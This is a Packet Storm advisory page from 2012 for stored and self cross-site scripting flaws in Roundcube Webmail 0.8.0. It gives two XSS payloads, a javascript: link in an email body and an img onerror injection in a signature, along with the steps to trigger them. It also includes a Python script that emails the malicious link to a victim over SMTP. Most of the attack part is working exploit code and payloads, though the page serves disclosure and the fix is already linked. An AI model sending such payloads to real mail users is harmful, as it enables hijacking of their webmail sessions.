what you don't know can hurt you

Roundcube Webmail 0.8.0 Cross Site Scripting

Roundcube Webmail 0.8.0 Cross Site Scripting
Posted Aug 17, 2012
Authored by Shai rod

Roundcube Webmail version 0.8.0 suffers from multiple stored cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 89c5f2e08a58d9093ced0edf0cb5dd57

Roundcube Webmail 0.8.0 Cross Site Scripting

Change Mirror Download
#!/usr/bin/python

'''
# Exploit Title: Roundcube Webmail Stored XSS.
# Date: 14/08/2012
# Exploit Author: Shai rod (@NightRang3r)
# Vendor Homepage: http://roundcube.net
# Software Link: http://sourceforge.net/projects/roundcubemail/files/roundcubemail/0.8.0/roundcubemail-0.8.0.tar.gz/download
# Version: 0.8.0


#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar

# Timeline:
#14 Aug 2012: Discovered Vulnerability.
#14 Aug 2012: Opened Ticket #1488613 - http://trac.roundcube.net/ticket/1488613
#15 Aug 2012: Fix added to repo.

https://github.com/roundcube/roundcubemail/commit/c086978f6a91eacb339fd2976202fca9dad2ef32
https://github.com/roundcube/roundcubemail/commit/5ef8e4ad9d3ee8689d2b83750aa65395b7cd59ee


About the Application:
======================

Roundcube is a free and open source webmail solution with a desktop-like user interface which is easy to install/configure and that runs on a standard LAMPP
server. The skins use the latest web standards such as XHTML and CSS 2. Roundcube includes other sophisticated open-source libraries such as PEAR,
an IMAP library derived from IlohaMail the TinyMCE rich text editor, Googiespell library for spell checking or the WasHTML sanitizer by Frederic Motte.

Vulnerability Description
=========================

1. Stored XSS in e-mail body.

XSS Payload: <a href=javascript:alert("XSS")>POC MAIL</a>

Send an email to the victim with the payload in the email body, Once the user clicks on the url the XSS should be triggered.

2. Self XSS in e-mail body (Signature).

XSS Payload: "><img src='1.jpg'onerror=javascript:alert("XSS")>

In order to trigger this XSS you should insert the payload into your signature.

Settings -> Identities -> Your Identitiy -> Signature
Now create a new mail, XSS Should be triggered.

'''

import smtplib

print "###############################################"
print "# Roundcube 0.8.0 Stored XSS POC #"
print "# Coded by: Shai rod #"
print "# @NightRang3r #"
print "# http://exploit.co.il #"
print "# For Educational Purposes Only! #"
print "###############################################\r\n"

# SETTINGS

sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "192.168.1.10"
smtp_port = 25
subject = "Roundcube Webmail XSS POC"


# SEND E-MAIL

print "[*] Sending E-mail to " + recipient + "..."
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
% (sender, ", ".join(recipient), subject) )
msg += "Content-type: text/html\n\n"
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n"""
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print "[+] E-mail sent!"


Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close